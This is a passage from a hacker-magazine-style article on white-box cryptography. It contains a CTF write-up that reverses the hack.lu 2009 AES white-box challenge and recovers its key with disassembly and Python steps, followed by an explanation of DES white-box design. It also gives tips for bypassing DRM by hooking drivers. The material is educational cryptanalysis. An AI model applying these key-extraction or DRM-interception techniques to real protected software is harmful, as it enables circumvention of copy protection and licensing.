The main question is to know if there exists a secure WB design and if
|
|
you consider the current state of the art in cryptography, well... there
|
|
isn't! There is currently no implementation proposal not broken by design.
|
|
And in this case, broken means a key recovery in a matter of seconds in the
|
|
worst case. Yes, _that_ broken!
|
|
|
|
However, real-life white-box cryptography may be different because:
|
|
|
|
- As explained before, proprietary implementations of algorithms
|
|
not mentioned in any paper (MAC algorithms, asymmetric ones)
|
|
exist. This proves that people were smart enough to design new
|
|
implementations. On the other hand, without any formal analysis
|
|
of these implementations, nothing can be said regarding their
|
|
effective security.
|
|
|
|
- Cloakware products were at least partially designed/written by
|
|
the cryptographers who designed the first white-box [R7]. On one
|
|
hand you may suspect that their product is broken by design.
|
|
Alternatively it can be assumed that it is at least immune
|
|
against current cryptanalysis techniques. Little can be said
|
|
about other protections (whitecryption, Arxan, Syncrosoft) but we
|
|
could speculate that it's not of the same caliber.
|
|
|
|
So are WB protections hard to break in practice? Who knows? But
|
|
remember that protecting the key is one thing while protecting a content is
|
|
something different. So if you ever audit a white-box solution, before
|
|
trying to retrieve the key, see if you can intercept the plaintexts. There
|
|
are lots of possible attacks, potentially bypassing the WB protections
|
|
[R06].
|
|
|
|
Remark: Obviously in the case of DRM (if no hardware protection is
|
|
involved), you will always find a way to intercept unencrypted data. This
|
|
is because at some point the player will have to send audio/video streams
|
|
to the sound/video card drivers and you may want to hook some of their
|
|
functions to recover the media. This is however a practice to forget if the
|
|
media requires the synchronization of several streams (i.e. movies with
|
|
both audio and video).
|
|
|
|
Now that said, let's begin with the first challenge :)
|
|
|
|
|
|
--[ 4 - Handling the first case: hack.lu's challenge
|
|
|
|
|
|
I have to thank Jb for this binary as he was the one who suggested me
|
|
to solve it a few days ago*. Unfortunately my solution is biased as I knew
|
|
from the very beginning that it was an AES white-box. I may have taken a
|
|
different approach to solve it if I hadn't. This is however a good enough
|
|
example to introduce WB protections.
|
|
|
|
*: Phrack being usually late "a few days ago" probably means "a few weeks**
|
|
ago"
|
|
**: Phrack being _indeed_ late "a few weeks ago" is now "a few months ago"
|
|
;>
|
|
|
|
|
|
----[ 4.1 - The discovery step
|
|
|
|
|
|
Since the challenge is about breaking an AES white-box, it means that
|
|
we may need to perform several tasks:
|
|
|
|
- finding out if the WB is an AES or an AES^-1 and the associated key
|
|
length: 16 (AES-128), 24 (AES-192), 32 (AES-256)? We want to discover
|
|
exactly *what* was white-boxed.
|
|
|
|
- reversing every cryptographic functions involved and discovering how
|
|
they are related to the original AES functions. This is about
|
|
understanding *how* the implementation was white-boxed.
|
|
|
|
- finding a way to recover the original key.
|
|
|
|
I won't describe the AES as it's not necessary to understand this part.
|
|
The necessary details will be provided a bit later. First of all, let's see
|
|
how the serial is retrieved. We'll start by a quick reverse engineering of
|
|
the sub_401320() function:
|
|
|
|
---------------------------------------------------------------------------
|
|
mov eax, [esp+38h+hDlg]
|
|
push 21h ; cchMax
|
|
lea ecx, [esp+3Ch+String]
|
|
push ecx ; lpString
|
|
push 3ECh ; nIDDlgItem
|
|
push eax ; hDlg
|
|
call ds:GetDlgItemTextA
|
|
cmp eax, 20h ; is length == 32?
|
|
---------------------------------------------------------------------------
|
|
|
|
Without too much surprise, GetDlgItemText() is called to retrieve an
|
|
alpha-numeric string. The comparison in the last line implies a length of
|
|
32 bytes in its ASCII representation (not including the null byte) hence a
|
|
16 bytes serial. Let's continue:
|
|
|
|
---------------------------------------------------------------------------
|
|
cmp eax, 20h
|
|
jz short good_serial ; if len is ok then start the
|
|
; conversion
|
|
|
|
bad_serial:
|
|
xor eax, eax
|
|
[...]
|
|
retn ; return 0
|
|
good_serial:
|
|
push ebx
|
|
push esi
|
|
xor esi, esi ; i=0
|
|
nop
|
|
|
|
build_data_buffer:
|
|
movzx edx, [esp+esi*2+40h+String]
|
|
push edx
|
|
call sub_4012F0 ; get least significant nibble
|
|
mov ebx, eax
|
|
movzx eax, [esp+esi*2+44h+var_27]
|
|
push eax
|
|
shl bl, 4
|
|
call sub_4012F0 ; get most significant nibble
|
|
or bl, al ; bl is now a converted byte
|
|
mov byte ptr [esp+esi+48h+input_converted], bl
|
|
; input_converted[i] = bl
|
|
inc esi ; i++
|
|
add esp, 8
|
|
cmp esi, 10h
|
|
jl short build_data_buffer
|
|
|
|
lea ecx, [esp+40h+input_converted]
|
|
push ecx
|
|
mov edx, ecx
|
|
push edx
|
|
call sub_401250 ; white-box wrapper
|
|
add esp, 8
|
|
pop esi
|
|
mov eax, 10h
|
|
xor ecx, ecx
|
|
pop ebx
|
|
|
|
; Compare the resulting buffer byte after byte
|
|
|
|
compare_buffers:
|
|
mov edx, [esp+ecx+38h+input_converted]
|
|
cmp edx, dword ptr ds:aHack_lu2009Ctf[ecx]
|
|
; "hack.lu-2009-ctf"
|
|
jnz short bad_serial
|
|
sub eax, 4
|
|
add ecx, 4
|
|
cmp eax, 4
|
|
jnb short compare_buffers
|
|
[...]
|
|
retn
|
|
---------------------------------------------------------------------------
|
|
|
|
The alphanumeric string is then converted byte after byte using the
|
|
sub_4012F0() function in the corresponding plaintext (or ciphertext) block
|
|
for cryptographic manipulations. The function sub_401250() is then called
|
|
taking it as a parameter. When the function returns, the buffer is then
|
|
compared to the "hack.lu-2009-ctf" string (16 bytes). If both are equal,
|
|
the serial is valid (the function returns 1).
|
|
|
|
Let's see sub_401250() in more detail:
|
|
|
|
---------------------------------------------------------------------------
|
|
sub_401250 proc near ; WrapperWhiteBox
|
|
[...]
|
|
mov eax, [esp+14h+arg_0]
|
|
push esi
|
|
mov esi, [esp+18h+arg_4]
|
|
xor ecx, ecx
|
|
add eax, 2
|
|
lea esp, [esp+0]
|
|
|
|
permutation1:
|
|
; First step is a transposition (special permutation)
|
|
|
|
movzx edx, byte ptr [eax-2]
|
|
mov [esp+ecx+18h+var_14], dl
|
|
movzx edx, byte ptr [eax-1]
|
|
mov [esp+ecx+18h+var_10], dl
|
|
movzx edx, byte ptr [eax]
|
|
mov [esp+ecx+18h+var_C], dl
|
|
movzx edx, byte ptr [eax+1]
|
|
mov [esp+ecx+18h+var_8], dl
|
|
inc ecx
|
|
add eax, 4
|
|
cmp ecx, 4
|
|
jl short permutation1
|
|
|
|
; Second step is calling the white-box
|
|
|
|
lea eax, [esp+18h+var_14]
|
|
push eax
|
|
call sub_401050 ; call WhiteBox
|
|
[...]
|
|
|
|
permutation2:
|
|
; Third step is also a transposition
|
|
; Bytes' position are restored
|
|
|
|
movzx edx, [esp+ecx+14h+var_14]
|
|
mov [eax-2], dl
|
|
movzx edx, [esp+ecx+14h+var_10]
|
|
mov [eax-1], dl
|
|
movzx edx, [esp+ecx+14h+var_C]
|
|
mov [eax], dl
|
|
movzx edx, [esp+ecx+14h+var_8]
|
|
mov [eax+1], dl
|
|
inc ecx
|
|
add eax, 4
|
|
cmp ecx, 4
|
|
jl short permutation2
|
|
[...]
|
|
retn
|
|
---------------------------------------------------------------------------
|
|
|
|
At first sight, sub_401250() is composed of three elements:
|
|
|
|
- A first bunch of instructions operating on the buffer which is
|
|
no more than a (4x4) matrix transposition operating on bytes.
|
|
|
|
For example:
|
|
|
|
A B C D A E I M
|
|
E F G H becomes B F J N
|
|
I J K L C G K O
|
|
M N O P D H L P
|
|
|
|
This is a common step to prepare the plaintext/ciphertext block
|
|
into the so-called "state" as the AES is operating on 4x4 matrix.
|
|
|
|
- This function is then calling sub_401050() which is composed of
|
|
elementary operations such as XOR, rotations and substitutions.
|
|
|
|
- A second transposition. One important thing to know about the
|
|
transposition is that the function is its own inverse. The former
|
|
bytes' positions are thus restored.
|
|
|
|
sub_401050() is the WB. Whether it's an AES or an AES^-1 function and
|
|
its keylength has yet to be determined. The serial acts as a plaintext or
|
|
a ciphertext which is (de,en)crypted using a key that we want to retrieve.
|
|
Since the output buffer is compared with an English sentence, it seems fair
|
|
to assume that the function is an AES^-1.
|
|
|
|
|
|
Reverse engineering of sub_401050()
|
|
-----------------------------------
|
|
|
|
|
|
Detailing the whole reverse engineering steps is both boring and
|
|
meaningless as it doesn't require special skills. It's indeed pretty
|
|
straightforward. The resulting pseudo C code can be written as such:
|
|
|
|
----------------------------- First version -------------------------------
|
|
void sub_401050(char *arg0)
|
|
{
|
|
int round,i;
|
|
|
|
// 9 first rounds
|
|
for(round=0; round<9; round++)
|
|
{
|
|
// step-1(round)
|
|
for(i=0; i<16; i++)
|
|
arg0[i] = (char) 0x408138[ i + (arg0[i] + round*0x100)*16 ];
|
|
|
|
// step-2
|
|
sub_401020(arg0);
|
|
|
|
// step-3
|
|
for(i=0; i<4; i++)
|
|
{
|
|
char cl,dl, bl, var_1A;
|
|
|
|
cl = byte_414000[ arg0[0+i]*4 ];
|
|
cl ^= byte_414400[ arg0[4+i]*4 ];
|
|
cl ^= byte_414800[ arg0[8+i]*4 ];
|
|
cl ^= byte_414C00[ arg0[12+i]*4 ];
|
|
|
|
dl = byte_414000[ 1 + arg0[0+i]*4 ];
|
|
dl ^= byte_414400[ 1 + arg0[4+i]*4 ];
|
|
dl ^= byte_414800[ 1 + arg0[8+i]*4 ];
|
|
dl ^= byte_414C00[ 1 + arg0[12+i]*4 ];
|
|
|
|
bl = byte_414000[ 2 + arg0[0+i]*4 ];
|
|
bl ^= byte_414400[ 2 + arg0[4+i]*4 ];
|
|
bl ^= byte_414800[ 2 + arg0[8+i]*4 ];
|
|
bl ^= byte_414C00[ 2 + arg0[12+i]*4 ];
|
|
|
|
var_1A = bl;
|
|
|
|
bl = byte_414000[ 3 + arg0[0+i]*4 ];
|
|
bl ^= byte_414400[ 3 + arg0[4+i]*4 ];
|
|
bl ^= byte_414800[ 3 + arg0[8+i]*4 ];
|
|
bl ^= byte_414C00[ 3 + arg0[12+i]*4 ];
|
|
|
|
arg0[0+i] = cl;
|
|
arg0[4+i] = dl;
|
|
arg0[8+i] = var_1A;
|
|
arg0[12+i] = bl;
|
|
}
|
|
}
|
|
|
|
// step-4
|
|
for(i=0; i<16; i++)
|
|
arg0[i] = (char) 0x411138 [ i + arg0[i] * 16 ]
|
|
|
|
// step-5
|
|
sub_401020(arg0);
|
|
return;
|
|
}
|
|
----------------------------- First version -------------------------------
|
|
|
|
It seems that we have a 10 (9 + 1 special) rounds which probably means
|
|
an AES-128 or an AES-128^-1 (hence a 16 bytes keylength as both are
|
|
related).
|
|
|
|
Remark: Something very important is that we will try to solve this problem
|
|
using several assumptions or hypotheses. For example there is no evident
|
|
proof that the number of rounds is 10. It _seems_ to be 10 but until the
|
|
functions (and especially the tables) involved are not analyzed, we should
|
|
always keep in mind that we may be wrong with the guess and that some evil
|
|
trick could have been used to fool us.
|
|
|
|
Now we have the big picture, let's refine it a bit. For that, we will
|
|
analyze:
|
|
|
|
- The tables at addresses 0x408138 (step-1) and 0x411138 (step-4)
|
|
- The round independent function sub_401020 (step-2, step-5)
|
|
- step-3 and the 16 arrays byte_414x0y with:
|
|
- x in {0,4,9,C}
|
|
- y in {0,1,2,3}
|
|
|
|
The tables are quite easy to analyze. A short look at them show that
|
|
there is one substitution table per character per round. Each substitution
|
|
seems to be a "random" bijection. Additionally, 0x408138 + 16*256*9 =
|
|
0x411138 (which is the address of the last round's table).
|
|
|
|
The function sub_401020() is a mere wrapper of function sub_401000():
|
|
|
|
---------------------------------------------------------------------------
|
|
void sub_401020(arg0)
|
|
{
|
|
int i;
|
|
|
|
for(i=0; i<4; i++)
|
|
sub_401000(arg0, 4*i, i);
|
|
}
|
|
|
|
// arg4 parameter is useless but who cares?
|
|
void sub_401000(arg0, arg4, arg8)
|
|
{
|
|
if(arg8 != 0)
|
|
{
|
|
(int) tmp = ((int)arg0[4*arg8] << (8*arg8)) & 0xFFFFFFFF;
|
|
(int) arg0[4*arg8] = tmp | ((int)arg0[4*arg8] >> (32-(8*arg8)));
|
|
}
|
|
return;
|
|
}
|
|
---------------------------------------------------------------------------
|
|
|
|
This is clearly the ShiftRows() elementary function of the AES.
|
|
For example:
|
|
|
|
59 49 90 3F 59 49 90 3F [ <<< 0 ]
|
|
30 A7 02 8C becomes A7 02 8C 30 [ <<< 1 ]
|
|
0F A5 07 22 07 22 0F A5 [ <<< 2 ]
|
|
F9 A8 07 DD DD F9 A8 07 [ <<< 3 ]
|
|
|
|
here '<<<' is a cyclic shift
|
|
|
|
ShiftRows() is used in the encryption function while the decryption
|
|
function uses its inverse. Unless there is a trap to fool us, this is a
|
|
serious hint that our former assumption was wrong and that the WB is an
|
|
AES, not an AES^-1.
|
|
|
|
Now regarding step-3 let's begin by looking at the tables. They all
|
|
hold bijections but clearly neither random nor distinct ones. Let's look
|
|
for example at the byte_414400 table:
|
|
|
|
byte_414400 : 0 3 6 5 C F A 9 ...
|
|
|
|
(The elements of this table are located at 0x414400, 0x414404,
|
|
0x41440C, etc. This is because of the *4 that you can see in the C
|
|
code. This rule also applied to the 15 other tables.)
|
|
|
|
If you ever studied/implemented the AES then you must know that its
|
|
structure is algebraic. The MixColumns in particular is an operation
|
|
multiplying each columns of the state by a particular 4x4 matrix. The
|
|
coefficients of such mathematical objects are _not_ integers but rather
|
|
elements of GF(2^8) whose representation is fixed by a particular binary
|
|
polynomial.
|
|
|
|
Now if you don't have a clue about what I'm saying let's just say that
|
|
the multiplication of said AES coefficients is not a simple integer
|
|
multiplication. Since the calculus in itself would be highly inefficient
|
|
most implementations use special tables holding the precomputed results.
|
|
AES requires to know how to multiply by 01, 02, and 03 in GF(2^8). In
|
|
particular byte_414400 is a table used to compute b = 3*a in such field (a
|
|
is the index of the table and b is the value stored at this index).
|
|
|
|
Now let's look at the tables. In each case it was easy to see that they
|
|
were holding a precomputed multiplication by a given coefficient:
|
|
|
|
byte_414000 : 0 2 4 6 8 A C E ... // Coef = 2
|
|
byte_414400 : 0 3 6 5 C F A 9 ... // Coef = 3
|
|
byte_414800 : 0 1 2 3 4 5 6 7 ... // Coef = 1
|
|
byte_414C00 : 0 1 2 3 4 5 6 7 ... // Coef = 1
|
|
|
|
byte_414001 : 0 1 2 3 4 5 6 7 ... // Coef = 1
|
|
byte_414401 : 0 2 4 6 8 A C E ... // Coef = 2
|
|
byte_414801 : 0 3 6 5 C F A 9 ... // Coef = 3
|
|
byte_414C01 : 0 1 2 3 4 5 6 7 ... // Coef = 1
|
|
|
|
byte_414002 : 0 1 2 3 4 5 6 7 ... // Coef = 1
|
|
byte_414402 : 0 1 2 3 4 5 6 7 ... // Coef = 1
|
|
byte_414802 : 0 2 4 6 8 A C E ... // Coef = 2
|
|
byte_414C02 : 0 3 6 5 C F A 9 ... // Coef = 3
|
|
|
|
byte_414003 : 0 3 6 5 C F A 9 ... // Coef = 3
|
|
byte_414403 : 0 1 2 3 4 5 6 7 ... // Coef = 1
|
|
byte_414803 : 0 1 2 3 4 5 6 7 ... // Coef = 1
|
|
byte_414C03 : 0 2 4 6 8 A C E ... // Coef = 2
|
|
|
|
As a result, step-3 can be written as:
|
|
|
|
[ arg0(0,i) [ 02 03 01 01 [ arg0(0,i)
|
|
arg0(4,i) = 01 02 03 01 x arg0(4,i)
|
|
arg0(8,i) 01 01 02 03 arg0(8,i)
|
|
arg0(c,i) ] 03 01 01 02 ] arg0(c,i) ]
|
|
|
|
And this is exactly the MixColumns of the AES! Everything taken into
|
|
account gives this new version of sub_401250():
|
|
|
|
---------------------------- Second version -------------------------------
|
|
void sub_401050(char *arg0)
|
|
{
|
|
int round,i;
|
|
|
|
// 9 first rounds
|
|
for(round=0; round<9; round++)
|
|
{
|
|
// step-1(round)
|
|
for(i=0; i<16; i++)
|
|
arg0[i] = (char) 0x408138[ i + (arg0[i] + round*0x100)*16 ];
|
|
|
|
// step-2
|
|
ShiftRows(arg0);
|
|
|
|
// step-3
|
|
MixColumns(arg0);
|
|
}
|
|
|
|
// Last round
|
|
|
|
// step-4
|
|
for(i=0; i<16; i++)
|
|
arg0[i] = (char) 0x411138 [ i + arg0[i]*16 ];
|
|
|
|
// step-5
|
|
ShiftRows(arg0);
|
|
return;
|
|
}
|
|
---------------------------- Second version -------------------------------
|
|
|
|
This confirms the assumption that the WB is an AES as AES^-1 uses the
|
|
invert function of MixColumns which makes use of a different set of
|
|
coefficients (matrix inversion). As you can see the key material is not
|
|
explicit in the code, somehow hidden in the tables used in step-1. Kinda
|
|
normal for a WB ;)
|
|
|
|
|
|
----[ 4.2 - The key recovery
|
|
|
|
|
|
The general algorithm (not including the key schedule which generates K)
|
|
of AES-128 encryption is the following:
|
|
|
|
---------------------------------------------------------------------------
|
|
ROUNDS=10
|
|
def AES_128_Encrypt(in):
|
|
|
|
out = in
|
|
AddRoundKey(out, K[0])
|
|
|
|
for r in xrange(ROUNDS-1):
|
|
SubBytes(out)
|
|
ShiftRows(out)
|
|
MixColumns(out)
|
|
AddRoundKey(out,K[r])
|
|
|
|
SubBytes(out)
|
|
ShiftRows(out)
|
|
AddRoundKey(out, K[10])
|
|
return out
|
|
---------------------------------------------------------------------------
|
|
|
|
Where K[r] is the subkey (16 bytes) used in round r. From now on, 'o'
|
|
is the symbol for the composition of functions, this allows us to write:
|
|
|
|
SubBytes o AddRoundKey(K[r],IN) = step-1(IN,r) for r in [0..9]
|
|
|
|
Exploiting the first round, this immediately gives a system of
|
|
equations (with S being located at 0x408138):
|
|
|
|
SubBytes(K[0][i] ^ arg0[i]) = S[ i + arg0[i]*16 ] for i in [0..15]
|
|
|
|
The equations hold for any arg0[i] and in particular for arg0[i] = 0.
|
|
The resulting simplified system is thus:
|
|
|
|
SubByte(K[0][i]) = S[i] for i in [0..15]
|
|
K[0][i] = SubByte()^-1 o S[i] for i in [0..15]
|
|
|
|
Let's try it on the rub^Wpython console:
|
|
|
|
---------------------------------------------------------------------------
|
|
>>> sbox2 = inv_bij(sbox); # We compute SubBytes^-1
|
|
>>> S = [0xFA, 0xD8, 0x88, 0x91, 0xF1, 0x93, 0x3B, 0x39, 0xAE, 0x69, 0xFF,
|
|
0xCB, 0xAB, 0xCD, 0xCF, 0xF7]; # dumped @ 0x0408138
|
|
>>> for i in xrange(16):
|
|
... S2[i] = sbox2[S2[i]];
|
|
...
|
|
>>> S2;
|
|
[20, 45, 151, 172, 43, 34, 73, 91, 190, 228, 125, 89, 14, 128, 95, 38]
|
|
---------------------------------------------------------------------------
|
|
|
|
But remember that a transposition is necessary to retrieve the subkey!
|
|
|
|
---------------------------------------------------------------------------
|
|
>>> P = [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15] #I'm lazy :)
|
|
>>> S4 = []
|
|
>>> for i in xrange(16):
|
|
... S4.insert(i,S2[P[i]])
|
|
---------------------------------------------------------------------------
|
|
|
|
Now S4 holds the subkey K[0]. An interesting property of the AES key
|
|
schedule is that the subkey K[0] is equal to the key before derivation.
|
|
This is why our priority was to exploit the first round.
|
|
|
|
---------------------------------------------------------------------------
|
|
>>> s = 'hack.lu-2009-ctf'
|
|
>>> key = ''.join(map(lambda x: chr(x), S4))
|
|
>>> key
|
|
'\x14+\xbe\x0e-"\xe4\x80\x97I}_\xac[Y&'
|
|
>>> keyObj=AES.new(key)
|
|
>>> encPwd=keyObj.decrypt(s)
|
|
>>> encPwd.encode('hex').upper()
|
|
'192EF9E61164BD289F773E6C9101B89C'
|
|
---------------------------------------------------------------------------
|
|
|
|
And the solution is the same as baboon's one [R03]. Of course there
|
|
were many other ways to proceed but it's useless to even consider them due
|
|
to the very weak nature of this 'WB'.
|
|
|
|
|
|
----[ 4.3 - Random thoughts
|
|
|
|
|
|
Jb designed this challenge so that it could be solved in the 2-days
|
|
context of the hack.lu CTF. It's very likely that any reverser familiar
|
|
with the AES would be able to deal with it rather easily and so did baboon
|
|
at that time when he came up with a smart and quick solution [R03]. If Jb
|
|
had used the implementation described in [R07] then it would have been a
|
|
whole other game though still breakable [R05].
|
|
|
|
That being said, this implementation (which is based on what is called
|
|
partial evaluation) may only be a toy cipher but it's perfect to introduce
|
|
more advanced concepts. Indeed several security measures (amongst others)
|
|
were voluntary missing:
|
|
|
|
- ShiftRows() and MixColumns() were not modified. A strong
|
|
implementation would have transformed them. Additionally SubBytes()
|
|
could have been transformed in a less gentle manner to mitigate
|
|
trivial attacks.
|
|
|
|
- There is a direct correspondence between an obfuscated function and
|
|
it's unprotected "normal" counterpart. Inputs and outputs of such
|
|
functions are synchronized or you could say that intermediate states
|
|
can be observed. "Internal encoding" removes this property.
|
|
|
|
- The first and last rounds should have a special protection. This is
|
|
because the input (respectively the output) of the first
|
|
(respectively the last) round can be synchronized with the normal
|
|
implementation. "External encoding" is used to prevent this but as a
|
|
side effect alter the compatibility with the original encryption.
|
|
|
|
- etc.
|
|
|
|
Remark: If you ever come across a WB implementation, let me give you 2 nice
|
|
tricks to see in the blink of an eye if it's potentially weak or not:
|
|
|
|
- Look at the size of the implementation. Remember that the size of an
|
|
obfuscated primitive is deeply related to the number and size of the
|
|
lookup tables, the weight of the opcodes being generally negligible.
|
|
In this case, the binary was 85 kB whereas the state of the art
|
|
requires at least 770 kB. It was thus obvious that several
|
|
obfuscation layers were missing.
|
|
|
|
- The fully obfuscated version of the algorithms described in [R07]
|
|
only uses XOR and substitutions (lookup tables) as MixColumns and
|
|
ShiftRows are both transformed to make it possible. One may however
|
|
point out that the statement holds with T-tables based
|
|
implementations. It's true but such implementations use well known
|
|
tables so it's easy to fingerprint them.
|
|
|
|
Remember that real-life white-boxes (i.e. used in DRM, embedded
|
|
devices, etc.) are likely to be close to the state of the art (assuming
|
|
they are designed by crypto professionals and not by the average engineer
|
|
;)). Conversely, they may also face practical problematics (size, speed)
|
|
which have an impact on their security. This is especially true with
|
|
embedded devices.
|
|
|
|
|
|
--[ 5 - White-boxing the DES
|
|
|
|
|
|
If you're still reading (hi there!) then it probably means that you
|
|
already have at least a basic knowledge of cryptography. So you know that
|
|
DES should not be used because of its short keylength (56 bits), right?
|
|
Then why the hell should we be focused on it? Well because:
|
|
|
|
- There are only 2 public white-box design families: AES and DES
|
|
- If you can white-box DES, then you can probably white-box 3DES as
|
|
well (which is strong)
|
|
- I couldn't find a non commercial sophisticated enough AES WB to play
|
|
with and I don't want to be sued by M$, Adobe, etc. :D
|
|
|
|
Remark: While AES WB cryptanalysis are essentially algebraic, DES related
|
|
ones are statistical as you will soon find out.
|
|
|
|
|
|
----[ 5.1 - The DES algorithm
|
|
|
|
|
|
DES is a so called Feistel cipher [R01] with a block size of 64 bits
|
|
and 16 rounds (r). First a permutation (IP) is applied to the input then
|
|
in each round a round-function is applied which splits its input in two 32
|
|
bits buffers L (Left) and R (Right) and applies the following equations
|
|
system:
|
|
|
|
L(r+1) = R(r)
|
|
R(r+1) = L(r) [+] f(R(r),K(r))
|
|
|
|
With:
|
|
0 <= r < 16
|
|
[+] being the XOR operation
|
|
|
|
The round function is described by the following scheme:
|
|
|
|
--------------------------- DES round function ----------------------------
|
|
********** **********
|
|
* L(r) * * R(r) *
|
|
********** **********
|
|
| |
|
|
.------------- |
|
|
| | v .---------------------.
|
|
| | .-------------. / Linear transformation \
|
|
| | \ E-Box / ( 32b -> 48b )
|
|
| | '---------' \ /
|
|
| | | '---------------------'
|
|
| | v .------------.
|
|
| | ..... ********** / XOR operand \
|
|
| | . + .<------ * K(r) * ( 2x48b -> 48b )
|
|
| | ..... ********** \ /
|
|
| | /\ '------------'
|
|
| | / \
|
|
| | v v .-------------------------.
|
|
| | .------. .------. / Non linear transformation \
|
|
| | \ S1 / ... \ S8 / ( using SBox )
|
|
| | '--' '--' \ 8x6b -> 8x4b /
|
|
| | \ / '-------------------------'
|
|
| | \ /
|
|
| | v v .---------------------.
|
|
| | .--------. / Linear transformation \
|
|
| | | P-Box | ( 32b -> 32b )
|
|
| | '--------' \ /
|
|
| | | '---------------------'
|
|
| | ..v.. .------------.
|
|
| '--------->. + . / XOR operand \
|
|
| ..... ( 2x32b -> 32b )
|
|
| | \ /
|
|
v v '------------'
|
|
********** **********
|
|
* L(r+1) * * R(r+1) *
|
|
********** **********
|
|
---------------------------------------------------------------------------
|
|
|
|
When the 16 rounds are completed, the IP^-1() function is applied and
|
|
the result is called the ciphertext.
|
|
|
|
While SBox and XOR are self explanatory, let me give you a few more
|
|
details about the linear transformations (E-Box and P-Box).
|
|
|
|
|
|
The E-Box
|
|
---------
|
|
|
|
|
|
The E-Box is used to extend a 32 bits state into a 48b one so that each
|
|
bit can be combined with a round-key bit using a XOR. To transform 32 bits
|
|
into 48 bits, 16 out of the 32 bits are duplicated. This is performed using
|
|
the following table:
|
|
|
|
32, 1, 2, 3, 4, 5,
|
|
4, 5, 6, 7, 8, 9,
|
|
8, 9, 10, 11, 12, 13,
|
|
12, 13, 14, 15, 16, 17,
|
|
16, 17, 18, 19, 20, 21,
|
|
20, 21, 22, 23, 24, 25,
|
|
24, 25, 26, 27, 28, 29,
|
|
28, 29, 30, 31, 32, 1
|
|
|
|
For example, the first bit of output will the last bit of input (32)
|
|
and the second bit of output will be the first bit of input (1). In this
|
|
particular case the bit positions are written from 1 to 32. As you may have
|
|
noticed, the 16 bits from columns 3 and 4 are not duplicated. They are
|
|
called the middle bits, we will see later why they are important.
|
|
|
|
|
|
The P-Box
|
|
---------
|
|
|
|
|
|
The P-Box is a bit permutation which means that every bit of input will
|
|
have a new position in the output. Such a transformation is linear and can
|
|
be represented by a bit matrix. When combined with a XOR operation with a
|
|
constant, this is what we call an affine transformation (AT).
|
|
|
|
|
|
----[ 5.2 - An overview of DES WB primitives
|
|
|
|
|
|
The first WB DES implementation was presented in [R09]. Explaining how
|
|
and why DES white-box were designed is not the most simple of the task
|
|
especially with an ASCII / 75 columns constraint ;> I'll try to focus on
|
|
the main mechanisms so that you can get a global picture with the next
|
|
section. At some point you may however feel lost. In that case, please read
|
|
the excellent [R15] <3
|
|
|
|
|
|
The protection of I/O
|
|
---------------------
|
|
|
|
|
|
The reverser is able to intercept every step of the algorithm as well
|
|
as to examine all the memory. This gives him a huge advantage as he can
|
|
easily trace all inputs and outputs of elementary functions of the WB.
|
|
|
|
In the case of DES, this is even easier thanks to the very nature of
|
|
Feistel network. For example an attacker would easily locate the output of
|
|
the P-Box in round (r) because it is combined with part of the input: L(r).
|
|
To mitigate this, several transformations are performed:
|
|
|
|
a) All elementary operations of the white-box are performed on 96 bits
|
|
states. Let's try to understand why.
|
|
|
|
Initially a native DES round begins which the 64 bits state
|
|
L(r) || R(r). R(r) is then extended using the E-box to
|
|
generate a 8x6 = 48 bits buffer and at the same time, L(r) and R(r)
|
|
are still part of the internal state because they are still
|
|
contributing to the round's operations:
|
|
|
|
|
|
************** **************
|
|
* L(r) * * R(r) *
|
|
************** **************
|
|
| .------------| 32b
|
|
| | v
|
|
| | .-------------------.
|
|
32b | 32b | | E-box |
|
|
| | '-------------------'
|
|
| | | 48b
|
|
v v v
|
|
Mem1 Mem2 Mem3
|
|
|
|
|
|
At this point the internal state is composed of 32 x 2 + 48 = 112
|
|
bits which is the maximum required size before being shrunken to a
|
|
64 bits state at the end of the round: L(r+1) || R(r+1). To avoid
|
|
any information leak, a unique -constant size- state is used to hide
|
|
the position of the bits.
|
|
|
|
If you remember 5.1 paragraph, the E-Box is duplicating 16 out of
|
|
the 32 bits of R(r). As a result, constructing 'Mem2' can be done
|
|
extracting 16 bits out of R(r) and the 16 remaining ones out of
|
|
'Mem3'. With this property, the internal state is composed of 96
|
|
bits. Here is a diagram ripped from [R17] to understand how the
|
|
primitive is modified to handle this 96 bits state:
|
|
|
|
|
|
32b 48b 16b
|
|
************** ********************* ********
|
|
state 1: * L(r) * * X(r) * * r(r) *
|
|
************** ********************* ********
|
|
| | | |
|
|
| v | |
|
|
| ********* ..... | v
|
|
| * sK(r) *--> . + . | .-------.
|
|
| ********* ..... '-->( Merge )
|
|
| | '-------'
|
|
| v |
|
|
| .-------------. |
|
|
| \ S / |
|
|
| '---------' |
|
|
| | |
|
|
32b v v 32b 32b v
|
|
************** *************** ***************
|
|
state 2: * L(r) * * Y(r+1) * * R(r) *
|
|
************** *************** ***************
|
|
| | |
|
|
v | |
|
|
..... .--------. | |
|
|
. + .<---| P |<-' |
|
|
..... '--------' |
|
|
| |
|
|
32b '----------------------------------.
|
|
| | |
|
|
.-------------------|-----------' |
|
|
| 32b v v 32b
|
|
| .-------. .------.
|
|
| / E-box \ ( Select )
|
|
| 32b '-----------' '------'
|
|
| | |
|
|
v 48b v v 16b
|
|
************** ********************* ********
|
|
state 3: * L(r+1) * * X(r+1) * *r(r+1)*
|
|
************** ********************* ********
|
|
|
|
With:
|
|
- sK(r) being the subkey of round r
|
|
- X(r) being the output of the E-box of round r-1
|
|
- Y(r) being the output of the SBox of round r-1
|
|
- r(r) being the complementary bits so that X(r) and r(r) is a
|
|
duplication of R(r)
|
|
|
|
b) Input and outputs between elementary operations are protected using
|
|
what is called the "internal encodings". These encodings are applied
|
|
to functions implemented as lookup tables.
|
|
|
|
Let's take an example. You are chaining f() and g() which means that
|
|
you are calculating the composition g() o f(). Obviously without any
|
|
protection, an attacker can intercept the result of f() at debug
|
|
time (e.g. by putting a breakpoint at the entry of g())
|
|
|
|
Now if you want to protect it, you can generate a random bijection
|
|
h() and replace f() and g() by F() and G() where:
|
|
|
|
F() = h() o f()
|
|
G() = g() o h()^-1
|
|
|
|
Note: Again this is a mere example, we do not care about the
|
|
{co}domain consideration.
|
|
|
|
These functions are evaluated and then expressed as lookup tables.
|
|
Obviously this will not change the output as:
|
|
|
|
G() o F() = (g() o h()^-1) o (h() o f())
|
|
= g() o (h()^-1 o h()) o f() [associativity]
|
|
= g() o f()
|
|
|
|
But the difference is that intercepting the output of F() doesn't
|
|
give the output of f(). Pretty cool trick, right?
|
|
|
|
However I've just written that WB DES implementations were always
|
|
manipulating 96 bits states. Then does it mean that we need lookup
|
|
tables of 2^96 entries? No, this would be troublesome ;> We can use
|
|
the so called "path splitting" technique.
